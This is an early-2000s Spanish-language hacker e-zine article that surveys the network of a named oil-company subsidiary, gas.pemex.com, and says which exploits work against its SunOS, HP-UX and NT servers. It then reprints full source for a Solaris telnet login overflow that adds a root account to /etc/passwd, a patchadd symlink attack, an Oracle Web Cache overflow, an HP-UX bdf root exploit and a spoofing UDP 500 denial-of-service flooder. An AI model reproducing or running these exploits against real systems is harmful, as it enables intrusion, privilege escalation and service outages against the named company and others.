Copy Link
Add to Bookmark
Report
4.10 - Hack al los servidores de Pemex
Write: Ac|d z3r0
From: www.AcidKlan.org
Reply To: z3r0@acidklan.org
Analisis de Gas.Pemex.Com
Dentro PEMEX, existen algunas sub redes el caso gas.pemex.com que corresponde al area de Pemex Gas y Petroquimica Basica, Analizando un poco los fierros que se tienen en gas.pemex.com he concluido que algunas de las nuevas exploits funcionan de maravilla dentro, y algunas fuera de la red.
Les explico como esta consituida los fierros en gas.pemex.com
| -- Servidores NT
|
-Router |
Cisco WSC616 --- | -- Servidor SunOS
|
|
| -- Servidores HP-UXAntes de esta estructura esta un IBM MainFrame con una Firewall Fisica, pero esto es hablando de pemex.com, gas.pemex.com es otra Red por asi llamarla, pero si estas buscando saltar de gas.pemex.com a pemex.com te la pelas por la firewall y porque la Main Frame corre un IDS muy chingon, y por si fuera poco estan en una VPN, asi que a todos los lammersitos que se estan exisitando pues nada mas se la pelaron.
Una vez explicado esto desglosemos este pedo.
Vulnerabilidades en SunOS
Los Servidores de Sun cuentan con varios usos dentro de la red son
- Base de Datos con Oracle
- Base de Datos con Informix
- Monitoreo de Enlaces
- Publicacion de Base de Datos Oracle - ISS 5.0
Encontre que los siguientes Exploits si funcionan:
- Smash Bin Login
- Patchadd
- WebCache
Vulnerabilidades en HP UX
Los Servidores con HP UX son usados para el monitoreo de los enlaces foraneos y para concentrar los servicios destinados al Respaldo de Informacion aunque algunos de estos Servidores tambien tienen Instalado Oracle pero :) hermosamente son manejadores del Jet Admin es decir de los Servicios de Impresion por lo cual concluimos que las exploits que si funcionan son:
- Online Printer BDF
- Nota los Servicios de Oracle, no permiten la explotacion con el Exploit de WebCache pero no pierden nada con intentar.
Vulnerabilidad en NT
En la red son usados estos servidores para sostener la red para bajar el enlace del router, y esta dado de alta como el dominio para las Windows Cliente (gas.pemex.com) ademas de las cuentas de correo con Microsoft Exchange, y claro que si nuestro amigo el ISS 5.0 esta instalado, aunque han corregido varias fallas les falta una que acaba de salir como ven? es la siguiente:
* UDP 500 (DoS)Para Cualquiera Lamersito que quiera sentirse Elite y pensar que puede robar las bases de Datos de Pemex, les informo la Red Esta Encriptada 128 Bit's aunque pueden leer los correos de los gerentes si gustan.
Ademas este Articulo sera enviado al Administrador de gas.pemex.com para que mejoren o actualizen la Seguridad en su Red.
Una vez mas este texto es informativo y no es para que ningun pendejo ande abusando de esta informacion.
Las Exploits estan Anexadas en el archivo anexo gas-pemex.zip y no fueron creadas por mi persona fueron tomadas de otras Webs, y se dejaron igual que como fueron creadas. Para la distribucion de este texto son libres solamente nombre al AcidKlan.org como fuente de dicha informacion
www.AcidKlan.Org
www.Acidklan.org - / - Acidklan Radio
smash_bin_login.c (Smash Bin Login)
/*
* 2001.11.26
* Solaris x86 2.8
* /bin/login remote exploit
* it works for telnet
* This code so many fixed addresses,so it may not work on other systems...
* Author: mat@monkey.org (JW. Oh)
* No warranty! Use at your own risk! And don't ask me anything!!!
* change exec_argv3 value to execute your own command
* and use ip address instead of hostname for argv[0]
* updated 2001.11.26.
* added if you installed solaris x86 full package uncomment X86_FULL_PACKAGE
end-user
0x080654d4->0x080656ac at 0x000054d4: .got ALLOC LOAD DATA HAS_CONTENTS
0x080667b0->0x080689d4 at 0x000067b0: .bss ALLOC
full users
0x080654e0->0x080656b8 at 0x000054e0: .got ALLOC LOAD DATA HAS_CONTENTS
0x080667b8->0x080689dc at 0x000067b8: .bss ALLOC
if your system is not exploited with this exploit, try dump sections with gdb...and compare the .got,.bss section values...
*/
//#define X86_FULL_PACKAGE
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <stdlib.h>
void dump_hex(char *str,char *data,int len)
{
int i;
if(str)
{
printf("\n=======%s:%d========\n",str,len);
}else{
printf("\n=======================\n");
}
for(i=0;i<len;i++)
{
printf("x%.2x",(data[i]&0xff));
}
printf("\n-----------------------\n");
for(i=0;i<len;i++)
{
if(data[i]==0x00)
{
printf("|");
}else
{
printf("%c",data[i]);
}
}
printf("\n");
fflush(stdout);
}
int send_data(int sock,const char *send_data,int send_len)
{
int wc;
int rc;
char recv_buf[1000];
if(send_data && send_len>0)
{
wc=send(sock,send_data,send_len,0);
}
rc=recv(sock,recv_buf,sizeof(recv_buf),0);
if(rc>0)
{
dump_hex("recv",recv_buf,rc);
}
}
void main(int argc,char *argv[])
{
int sock;
struct sockaddr_in address;
int i;
char send_data_1[]={
0xff,0xfd,0x03,
0xff,0xfb,0x18,
0xff,0xfb,0x1f,
0xff,0xfb,0x20,
0xff,0xfb,0x21,
0xff,0xfb,0x22,
0xff,0xfb,0x27,
0xff,0xfd,0x05,
0xff,0xfb,0x23
};
char send_data_2[]={
0xff,0xfa,0x1f,0x00,0x50,0x00,0x18,
0xff,0xf0,
0xff,0xfc,0x24
};
char send_data_3[]={
0xff,0xfd,0x01,
0xff,0xfc,0x01
};
char str_buffer[1024*30];
int str_buffer_pos=0;
char str_end[2]={0xd,0x0};
char *env_str;
int env_str_len;
char env_1[4]={0xff,0xfa,0x18,0x00};
char *terminal_name="xterm-debian";
char env_2[6]={0xff,0xf0,0xff,0xfa,0x23,0x00};
char *display="matter:0.0";
char env_3[7]={0xff,0xf0,0xff,0xfa,0x27,0x00,0x00};
char *display_var="DISPlAY";
char display_delimiter[1]={0x01};
char *display_value="matter:0.0";
char *environ_str;
int environ_str_len;
int env_cur_pos=0;
int env_num;
char env_4[2]={0xff,0xf0};
char exploit_buffer[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\r\n";
char login_buffer[]=
"ji1=A ji2=A ji3=A ji4=A ji5=A ji6=A ji7=A ji8=A ji9=Z ji10=z\\\r\n\
ji11=B ji12=A ji13=A ji14=b ji15=A ji16=A ji17=A ji18=A ji19=B ji20=b\\\r\n\
ji21=C ji22=A ji23=A ji24=c ji25=A ji26=A ji27=A ji28=A ji29=C ji30=c\\\r\n\
ji32=D ji32=A ji33=A ji34=d ji35=A ji36=A ji37=A ji38=A ji39=D ji40=d\\\r\n\
ji41=E ji42=A ji43=A ji44=e j";
char realfree_edx[]={0x83,0x83,0x83,0x83}; //0xdf9d6361 <realfree+81>: test $0x1,%dl∏¶ ≥—±‚±‚ ¿ß«ÿº≠
char login_buffer1[]="=A j";
#ifdef X86_FULL_PACKAGE
char t_delete_edi_plus_0x8[]={0x2f,0x80,0x06,0x08};
#else
char t_delete_edi_plus_0x8[]={0x27,0x80,0x06,0x08};
#endif
char t_delete_edi_plus_0xa[]="=A j";
char t_delete_edi_plus_0x10[]={0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff};
char login_buffer1_0[]="=A ji48=A j ";
#ifdef X86_FULL_PACKAGE
char t_delete_edi_plus_0x20[]={0xf0,0x55,0x6,0x08};
#else
char t_delete_edi_plus_0x20[]={0xe8,0x55,0x6,0x08};
#endif
char login_buffer1_1[]="=\\\r\n\
ji51=F ji52=A ji53=A ji54=f ji55=A ji56=A j=iheol i58=";
#ifdef X86_FULL_PACKAGE
char t_delete2_param1[]={0x29,0x80,0x06,0x08};
#else
char t_delete2_param1[]={0x21,0x80,0x06,0x08};
#endif
char login_buffer1_2[]=" 6=8";
char link_pos[]={0x97,0xff,0xff,0xff,0xff,0xff,0xff};
//√ππ¯¬∞ A -1 ¿”
char login_buffer2[]="A=AB";
// 0x080654d4->0x080656ac at 0x000054d4: .got ALLOC LOAD DATA HAS_CONTENTS
//0x80655a4 <_GLOBAL_OFFSET_TABLE_+208>: 0xdf9bd0b8 <strncpy>
//(gdb) print/x 0x80655a4 - 0x20
//$1 = 0x8065584
#ifdef X86_FULL_PACKAGE
char t_delete2_edi_plus_0x8[]={0x90,0x55,0x06,0x08}; //strncpy-0x20,ecx
#else
char t_delete2_edi_plus_0x8[]={0x84,0x55,0x06,0x08}; //strncpy-0x20,ecx
#endif
char login_buffer2_0[]="GHIJ";
char t_delete2_edi_plus_0x10[]={0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff};
char login_buffer2_1[]="OPQRSTUVWXYZ";
//0x806810d <inputline+780>: 'A' <repeats 82 times>, "\n"
#ifdef X86_FULL_PACKAGE
char t_delete2_edi_plus_0x20[]={0x06,0x81,0x06,0x08}; //shellcode,eax
#else
char t_delete2_edi_plus_0x20[]={0xfe,0x80,0x06,0x08}; //shellcode,eax
#endif
//0x8067e01 <inputline>: "heowahfoihewobhfoiewhiofhoewhofhoeiwhofwhofhiewwhfoiew
char login_buffer2_2[]="efghijklmnopqrstuvwxyz0123456789A\\\r\n\
jk11=A jm21=C nj31=A jo41=A pi51=A jq61=A jr71=A js81=g jt91=A ju01=A jv11=A jw21=B jy";//31=A z";//4=A k2=A k3=A k";
#ifdef X86_FULL_PACKAGE
//char strncpy_src[]={0xf9,0x3b,0x05,0x08};
char strncpy_src[]={0x31,0x80,0x06,0x08};
#else
char strncpy_src[]={0xf1,0x3b,0x05,0x08};
#endif
char env_buffer[]="hi1=A hi2=A hi3=A hi";
char pam_input_output_eax[]={0x48,0x8a,0x06,0x08}; //0x8068a48
char env_buffer0[]="hi5=A hi6=A hi7=A hi";
#ifdef X86_FULL_PACKAGE
char free_dest_buffer[]={0x31,0x80,0x06,0x08};
#else
char free_dest_buffer[]={0x29,0x80,0x06,0x08};
#endif
char env_buffer2[]="zi9=";
#ifdef X86_FULL_PACKAGE
char free_dest_buffer2[]={0x31,0x80,0x06,0x08};
#else
char free_dest_buffer2[]={0x29,0x80,0x06,0x08};
#endif
char exp_buffer0[]="hello";
char jmp_code[]={0xeb,0xc};
char exp_buffer1[]="\\\r\nhhhhhhhhhhh";
char shellcode[]=
{
0xeb,0x1d,
0x5e, /*popl %esi*/
0x33,0xc0, /*xorl %eax,%eax*/
0x50, /*pushl %eax - ,0x0*/
#ifdef X86_FULL_PACKAGE
0x68,0x46,0x81,0x06,0x08,
0x68,0x43,0x81,0x06,0x08,
0x68,0x40,0x81,0x06,0x08,
0x68,0x38,0x81,0x06,0x08,
#else
0x68,0x3e,0x81,0x06,0x08,
0x68,0x3b,0x81,0x06,0x08,
0x68,0x38,0x81,0x06,0x08,
0x68,0x30,0x81,0x06,0x08,
#endif
#ifdef X86_FULL_PACKAGE
0xe8,0x25,0xa0,0xfe,0xff,0xff, /*call execve: 0xfffe9fee*/
#else
0xe8,0x2e,0xa0,0xfe,0xff,0xff, /*call execve: 0xfffe9fee*/
#endif
0xe8,0xde,0xff,0xff,0xff,0xff,0xff,0xff /*call again*/
};
char exec_argv0[]="/bin/sh";
char exec_argv1[]="sh";
char exec_argv2[]="-c";
char exec_argv3[]="/bin/echo met:x:0:1::/:/bin/sh>>/etc/passwd;";
//"/bin/echo met::11652::::::>>/etc/shadow;";
//"/bin/finger @210.111.69.137";
//211.59.123.155";
char extra_buffer[]="hihihiifhewiohfiowehfiohweiofhiowehfoihefe\\\r\n";
#ifdef X86_FULL_PACKAGE
char free_dest_buffer3[]={0x31,0x80,0x06,0x08};
#else
char free_dest_buffer3[]={0x29,0x80,0x06,0x08};
#endif
char env_buffer5[]="70=b \\\r\n\
hr371=b hs372=";
char pam_input_output_eax2[]={0xf5,0x3b,0x05,0x08};
char env_buffer5_0[]="473=";
char pam_get_authtok_eax[]={0xf6,0x3b,0x05,0x08}; //0x8053bfa ¿”Ω√∫Ø≈Î
char pam_get_data_esi[]={0xa8,0xb1,0x06,0x08};//0x806b1a8
display="";
terminal_name="";
env_str_len=
sizeof(env_1)+
strlen(terminal_name)+
sizeof(env_2)+
strlen(display)+
sizeof(env_3)+
strlen(display_var)+
sizeof(display_delimiter)+
strlen(display_value)+
sizeof(env_4);
env_str=(char *)calloc(1,env_str_len);
if(env_str)
{
env_cur_pos=0;
memcpy(env_str+env_cur_pos,env_1,sizeof(env_1));
env_cur_pos+=sizeof(env_1);
memcpy(env_str+env_cur_pos,terminal_name,strlen(terminal_name));
env_cur_pos+=strlen(terminal_name);
memcpy(env_str+env_cur_pos,env_2,sizeof(env_2));
env_cur_pos+=sizeof(env_2);
memcpy(env_str+env_cur_pos,display,strlen(display));
env_cur_pos+=strlen(display);
memcpy(env_str+env_cur_pos,env_3,sizeof(env_3));
env_cur_pos+=sizeof(env_3);
memcpy(env_str+env_cur_pos,display_var,strlen(display_var));
env_cur_pos+=strlen(display_var);
memcpy(env_str+env_cur_pos,display_delimiter,sizeof(display_delimiter));
env_cur_pos+=sizeof(display_delimiter);
memcpy(env_str+env_cur_pos,display_value,strlen(display_value));
env_cur_pos+=strlen(display_value);
memcpy(env_str+env_cur_pos,env_4,sizeof(env_4));
env_cur_pos+=sizeof(env_4);
}
/*socket operation*/
sock=socket(AF_INET,SOCK_STREAM,0);
if(sock<0)
{
return;
}
address.sin_family=AF_INET;
address.sin_port=htons(23);
//inet_pton(AF_INET,argv[1],&address.sin_addr); //on some system no inet_pton exists
address.sin_addr.s_addr=inet_addr(argv[1]);
if(connect(sock,(struct sockaddr *)&address,sizeof(address))<0)
{
return;
}
send_data(sock,NULL,0);
send_data(sock,send_data_1,sizeof(send_data_1));
send_data(sock,send_data_2,sizeof(send_data_2));
//dump_hex("env",env_str,env_cur_pos);
send_data(sock,env_str,env_cur_pos);
free(env_str);
send_data(sock,send_data_3,sizeof(send_data_3));
str_buffer_pos=0;
memcpy(str_buffer+str_buffer_pos,exploit_buffer,strlen(exploit_buffer));
str_buffer_pos+=strlen(exploit_buffer);
strcpy(str_buffer+str_buffer_pos,login_buffer);
str_buffer_pos+=strlen(login_buffer);
memcpy(str_buffer+str_buffer_pos,realfree_edx,sizeof(realfree_edx));
str_buffer_pos+=sizeof(realfree_edx);
strcpy(str_buffer+str_buffer_pos,login_buffer1);
str_buffer_pos+=strlen(login_buffer1);
memcpy(str_buffer+str_buffer_pos,t_delete_edi_plus_0x8,sizeof(t_delete_edi_plus_0x8));
str_buffer_pos+=sizeof(t_delete_edi_plus_0x8);
memcpy(str_buffer+str_buffer_pos,t_delete_edi_plus_0xa,strlen(t_delete_edi_plus_0xa));
str_buffer_pos+=strlen(t_delete_edi_plus_0xa);
memcpy(str_buffer+str_buffer_pos,t_delete_edi_plus_0x10,sizeof(t_delete_edi_plus_0x10));
str_buffer_pos+=sizeof(t_delete_edi_plus_0x10);
strcpy(str_buffer+str_buffer_pos,login_buffer1_0);
str_buffer_pos+=strlen(login_buffer1_0);
memcpy(str_buffer+str_buffer_pos,t_delete_edi_plus_0x20,sizeof(t_delete_edi_plus_0x20));
str_buffer_pos+=sizeof(t_delete_edi_plus_0x20);
strcpy(str_buffer+str_buffer_pos,login_buffer1_1);
str_buffer_pos+=strlen(login_buffer1_1);
memcpy(str_buffer+str_buffer_pos,t_delete2_param1,sizeof(t_delete2_param1));
str_buffer_pos+=sizeof(t_delete2_param1);
strcpy(str_buffer+str_buffer_pos,login_buffer1_2);
str_buffer_pos+=strlen(login_buffer1_2);
memcpy(str_buffer+str_buffer_pos,link_pos,sizeof(link_pos));
str_buffer_pos+=sizeof(link_pos);
strcpy(str_buffer+str_buffer_pos,login_buffer2);
str_buffer_pos+=strlen(login_buffer2);
memcpy(str_buffer+str_buffer_pos,t_delete2_edi_plus_0x8,sizeof(t_delete2_edi_plus_0x8));
str_buffer_pos+=sizeof(t_delete2_edi_plus_0x8);
strcpy(str_buffer+str_buffer_pos,login_buffer2_0);
str_buffer_pos+=strlen(login_buffer2_0);
memcpy(str_buffer+str_buffer_pos,t_delete2_edi_plus_0x10,sizeof(t_delete2_edi_plus_0x10));
str_buffer_pos+=sizeof(t_delete2_edi_plus_0x10);
strcpy(str_buffer+str_buffer_pos,login_buffer2_1);
str_buffer_pos+=strlen(login_buffer2_1);
memcpy(str_buffer+str_buffer_pos,t_delete2_edi_plus_0x20,sizeof(t_delete2_edi_plus_0x20));
str_buffer_pos+=sizeof(t_delete2_edi_plus_0x20);
strcpy(str_buffer+str_buffer_pos,login_buffer2_2);
str_buffer_pos+=strlen(login_buffer2_2);
memcpy(str_buffer+str_buffer_pos,strncpy_src,sizeof(strncpy_src));
str_buffer_pos+=sizeof(strncpy_src);
memcpy(str_buffer+str_buffer_pos,env_buffer,strlen(env_buffer));
str_buffer_pos+=strlen(env_buffer);
memcpy(str_buffer+str_buffer_pos,pam_input_output_eax,sizeof(pam_input_output_eax));
str_buffer_pos+=sizeof(pam_input_output_eax);
memcpy(str_buffer+str_buffer_pos,env_buffer,strlen(env_buffer0));
str_buffer_pos+=strlen(env_buffer0);
memcpy(str_buffer+str_buffer_pos,free_dest_buffer,sizeof(free_dest_buffer));
str_buffer_pos+=sizeof(free_dest_buffer);
memcpy(str_buffer+str_buffer_pos,env_buffer2,strlen(env_buffer2));
str_buffer_pos+=strlen(env_buffer2);
memcpy(str_buffer+str_buffer_pos,free_dest_buffer2,sizeof(free_dest_buffer2));
str_buffer_pos+=sizeof(free_dest_buffer2);
strcpy(str_buffer+str_buffer_pos,exp_buffer0);
str_buffer_pos+=strlen(exp_buffer0);
memcpy(str_buffer+str_buffer_pos,jmp_code,sizeof(jmp_code));
str_buffer_pos+=sizeof(jmp_code);
strcpy(str_buffer+str_buffer_pos,exp_buffer1);
str_buffer_pos+=strlen(exp_buffer1);
memcpy(str_buffer+str_buffer_pos,shellcode,sizeof(shellcode));
str_buffer_pos+=sizeof(shellcode);
strcpy(str_buffer+str_buffer_pos,exec_argv0);
str_buffer_pos+=strlen(exec_argv0)+1;
strcpy(str_buffer+str_buffer_pos,exec_argv1);
str_buffer_pos+=strlen(exec_argv1)+1;
strcpy(str_buffer+str_buffer_pos,exec_argv2);
str_buffer_pos+=strlen(exec_argv2)+1;
strcpy(str_buffer+str_buffer_pos,exec_argv3);
str_buffer_pos+=strlen(exec_argv3)+1;
memcpy(str_buffer+str_buffer_pos,str_end,strlen(str_end));
str_buffer_pos+=strlen(str_end);
{
char buf[100];
fgets(buf,100,stdin);
}
printf("sending login!\n");
fflush(stdout);
send_data(sock,str_buffer,str_buffer_pos);
send_data(sock,NULL,0);
printf("\n\n\npress return to send password\n...");
{
char buf[100];
fgets(buf,100,stdin);
}
send_data(sock,str_buffer,strlen(str_buffer)+1);
printf("\n\n\nwaiting for the realfree & t_delete to be called!\n...\n\n");
fflush(stdout);
sleep(30);
}
patchadd.pl (Patchadd)
Here is an exploit to an old bug for patchadd in Solaris. It exploits a
symlink vulnerability to clobber files with output from patchadd. This
was written and tested on Solaris 2.8 Sparc with the current patch cluster
applied.
-- Larry
http://vapid.dhs.org:8080
<----Begin perl---------------------------------------------------------->
#!/usr/local/bin/perl
#Exploit for patchadd Solaris 2.x. Symlink /tmp file creation
#vulnerability
#patchadd creates files in /tmp with mode 644 that can be used to clobber
#system files when executed by root.
#Larry W. Cashdollar
#http://vapid.dhs.org:8080
#See BID http://www.securityfocus.com/bid/2127
#Discovery credit: Jonathan Fortin jfortin@revelex.com
#Tested on SunOS smackdown 5.8 Generic_108528-10 sun4u sparc SUNW,Ultra-5_10
use strict;
my $NOISY = 1; # Do you want quiet output?
my $clobber = "/etc/passwd";
print "Listening for patchadd process...\n" if ($NOISY);
while(1) {
open (ps,"ps -ef | grep -v grep |grep -v PID |");
while(<ps>) {
my @args = (split " ", $_);
if (/patch/) {
print "Targeting PID $args[1] and symlinking response.$args[1] to
$clobber\n" if ($NOISY);
symlink($clobber,"/tmp/response.$args[1]");
exit(1);
}
}
}
<----end perl---------------------------------------------------------->
webcache.pl (WebCache)
#########################################################################
#
# Proof-of-concept exploit for Oracle9iAS Web Cache/2.0.0.1.0
# Creates the file c:\defcom.iyd
# By andreas@defcom.com (C)2001
#
#
# Since we do not control the space after what ESP points to, I was lazy
# and did a direct buffer jump. So, if it does not work, try changing
# the return address(start of buffer in mem) to one that fits your system.
# The buffer starts at 0x05c5f1e8 on my box(WIN2K prof SP2).
# /andreas
#
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
print "Usage: $0 <host>\n";
print "Example: $0 127.0.0.1\n";
exit;
}
use Socket;
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1100"; # default port for the web cache
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
$sploit = "\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xec\x8b\xc2\x83\xc0\x18\x33\xc9";
$sploit=$sploit . "\x66\xb9\xb3\x80\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa\xaa\x59";
$sploit=$sploit . "\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9\xf1\x99\x99\x99\x89\x1a\x5b\xa4";
$sploit=$sploit . "\xcb\x27\x51\x99\xd5\x99\x66\x8f\xaa\x59\xc9\x27\x09\x98\xd5\x99\x66";
$sploit=$sploit . "\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4\xb7\xf0\xe0\xfd\x99";
$msg = "GET " . $sploit . "\x90" x (3096 - length($sploit)) . "\xe8\xf1\xc5\x05" . " HTTP/1.0\n\n";
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;
hp-ux-bdf.c (Online Printer BDF)
/*
!! DISTRIBUTE !! DISTRIBUTE !!
[ www.interwn.nl ]
author: philer
philer@iraqmail.com
/usr/bin/bdf exploit - IWN-bdfx.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#define BUF_LENGTH 2420
#define STACK_OFFSET 0
#define EXTRA 600
#define IWN_NOP 0x3902800b
u_char IWN_shellcode[] =
"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff\xff";
u_long get_sp(void)
{
__asm__("movl %esp,%eax \n");
}
int main(int argc, char *argv[])
{
char buf[BUF_LENGTH + 8];
unsigned long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(IWN_shellcode),dso=STACK_OFFSET,xtra=EXTRA;
if(argc > 1) dso+=atoi(argv[1]);
if(argc > 2) xtra+=atoi(argv[2]);
long_p = (u_long *) buf;
for (i = 0; i < (BUF_LENGTH - code_length - xtra) / sizeof(u_long); i++)
*long_p++ = IWN_NOP;
char_p = (u_char *) long_p;
char_p--;
for (i = 0; i < code_length; i++)
*char_p++ = IWN_shellcode[i];
targ_addr = get_sp() - dso;
for (i = 0; i < xtra /4; i++)
{
*char_p++ =(targ_addr>>24)&255;
*char_p++ =(targ_addr>>16)&255;
*char_p++ =(targ_addr>>8)&255;
*char_p++ =(targ_addr)&255;
}
printf("\n\n [ www.interwn.nl ]\n");
printf("hp-ux-bdf.c - HP-UX /usr/bin/bdf exploit \n");
printf(" author: philer \n\n\n");
execl("/usr/bin/bdf","-t", buf,(char *) 0);
perror("[x] execl failed..");
return(-1);
}
/* www.interwn.nl */
nb-isakmp.c (UDP 500 (DoS))
/* Autor : Nelson Brito
* E-mail : nelson@SEKURE.ORG or nelson@WWSECURITY.NET
* URL : http://nelson.wwsecurity.net/
* Arquivo : nb-isakmp.c
* Vers„o : 0.3 Alpha
* PaÌs : Brasil
* Data : 11/12/2001
*
*
* DescriÁ„o:
* Este È a prova-do-conceito(proof-of-concept) do ataque de negaÁ„o
* de serviÁo(denial of service, a.k.a. DoS) que explora a falha do
* IKE/ISAKMP(UDP 500) em sistemas Windows 2000.
*
* Esta È a vers„o em C de um cÛdigo j· lanÁado em PERL(Net::RawIP).
*
* Feliz Natal e um Feliz Ano Novo.
* Merry Christmas and Happy New Year.
*/
#include <stdio.h>
#include <netdb.h>
#include <string.h>
#include <getopt.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#define ISAKMP_LEN 800
#define IPPORT_ISAKMP 500
#define SEND_MAX 31337
extern char *optarg;
extern int optind;
extern int h_errno;
void usage(char *name){
printf("\nUse: %s [options]\n\n", name);
printf("\t-s, --source*\t\tSource Address to Spoof\n");
printf("\t-d, --destination*\tDestination Address to Attack\n");
printf("\t-p, --port\t\tDestination Port to Attack\t(def: %d)\n", IPPORT_ISAKMP);
printf("\t-n, --number\t\tNumber of Packets to Send\t(def: %d)\n", SEND_MAX);
printf("\t-l, --length\t\tPackets Length\t\t\t(def: %d)\n", ISAKMP_LEN);
printf("\t-L, --loop\t\tSend Packets Forever\n");
printf("\t-h, --help\t\tShow this Message\n\n");
printf("Copyrigth(c) 2001 Nelson Brito<nelson@SEKURE.ORG>. All rigths reserved.\n");
exit(0);
}
void u_abort(int s){
printf("\nnb-isamkp.c: aborted process id %d.\n", getpid());
printf("Rock my world, baby!\n");
exit(0);
}
/*
* Eu j· vi v·rias funÁıes que fazem a mesma coisa, porÈm nunca de
* uma forma t„o robusta. Quero ver neguinho pagar pau pros gringos
* agora. ;-)
*/
u_long getip(char *destination){
static u_long ip_addr;
struct hostent *hostname;
hostname = gethostbyname(destination);
if(hostname == NULL){
switch(h_errno){
case HOST_NOT_FOUND:
printf("getip(): the spcified host is unknown.\n"); exit(0); break;
case NO_ADDRESS|NO_DATA:
printf("getip(): the requested name is valid but does not have an IP address.\n"); exit(0); break;
case NO_RECOVERY:
printf("getip(): a non-recoverable name server error occured.\n"); exit(0); break;
case TRY_AGAIN:
printf("getip(): a temporary error occurred on a AUTH NS, try again later.\n"); exit(0); break;
default: break;
}
}
memcpy(&ip_addr, hostname->h_addr, hostname->h_length);
return(ip_addr);
}
int isakmp_dos(int sock, u_long s_address, u_long d_address, int port, int number, int forever, int length){
int nbs,
i,
psize,
times = 0,
dp,
iplen = sizeof(struct iphdr),
udplen = sizeof(struct udphdr);
struct sockaddr_in sin;
struct _packet{
struct iphdr ip;
struct udphdr udp;
char data[length];
} nb_pkt;
sin.sin_family = AF_INET;
sin.sin_port = 1235;
sin.sin_addr.s_addr = d_address;
psize = iplen + udplen + length;
memset(&nb_pkt, 0, psize);
nb_pkt.ip.version = 4;
nb_pkt.ip.ihl = 5;
nb_pkt.ip.tot_len = htons(iplen + udplen + length);
nb_pkt.ip.id = htons(0xdead);
nb_pkt.ip.ttl = 0xff;
nb_pkt.ip.protocol = IPPROTO_UDP;
nb_pkt.ip.saddr = s_address;
nb_pkt.ip.daddr = d_address;
dp = port ? port : IPPORT_ISAKMP;
nb_pkt.udp.source = htons(dp);
nb_pkt.udp.dest = htons(dp);
nb_pkt.udp.len = htons(length);
nb_pkt.udp.check = htons(0xbeef);
for(i = 0 ; i < length ; i++)
nb_pkt.data[i] = 0x2e;
times = number ? number : SEND_MAX;
while(times > 0){
printf(".");
nbs = sendto(sock, &nb_pkt, psize, 0, (struct sockaddr *) &sin, sizeof(struct sockaddr));
if(!forever) times--;
}
return nbs;
}
int main(int argc, char **argv){
char *version = "0.3a";
u_long source, destination;
int lineopt,
port = 0,
nb,
nbs = 1,
loop = 0,
number = 0,
pkt_len,
src_ok = 0,
dst_ok = 0,
length = 0;
printf("--- nb-isakmp.c v.%s / Nelson Brito / Independent Security Consultant ---\n", version);
(argc < 4) ? usage(argv[0]) : (char *)NULL;
signal(SIGHUP, SIG_IGN);
signal(SIGINT, u_abort);
signal(SIGTERM, u_abort);
signal(SIGKILL, u_abort);
signal(SIGQUIT, u_abort);
while(1){
static struct option my_opt[]={
{"source", 1, 0, 's'},
{"destination", 1, 0, 'd'},
{"port", 1, 0, 'p'},
{"number", 1, 0, 'n'},
{"length", 1, 0, 'l'},
{"loop", 0, 0, 'L'},
{"help", 0, 0, 'h'},
{0, 0, 0, 0}
};
int option_index = 0;
lineopt = getopt_long(argc, argv, "s:d:p:n:l:Lh", my_opt, &option_index);
if(lineopt == -1) break;
switch(lineopt){
case 's':
source = getip(optarg); src_ok =1; break;
case 'd':
destination = getip(optarg); dst_ok = 1; break;
case 'p':
port = atoi(optarg); break;
if((port <= 0) || (port > 65535)){
printf("main(): port range error.\n");
}
case 'n':
number = atoi(optarg); break;
case 'l':
length = atoi(optarg); break;
case 'L':
loop = 1; break;
case 'h':
default:
usage(argv[0]); break;
}
}
if((!src_ok) || (!dst_ok)) usage(argv[0]);
if((nb = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))< 0){
printf("main(): socket() error.\n");
exit(0);
}
if(setsockopt(nb, IPPROTO_IP, IP_HDRINCL, (char *)&nbs, sizeof(nbs)) < 0){
printf("main(): setsockopt() error.\n");
exit(0);
}
pkt_len = length ? length : ISAKMP_LEN;
isakmp_dos(nb, source, destination, port, number, loop, pkt_len);
printf("\nRock my world, baby!\n");
return(1);
}
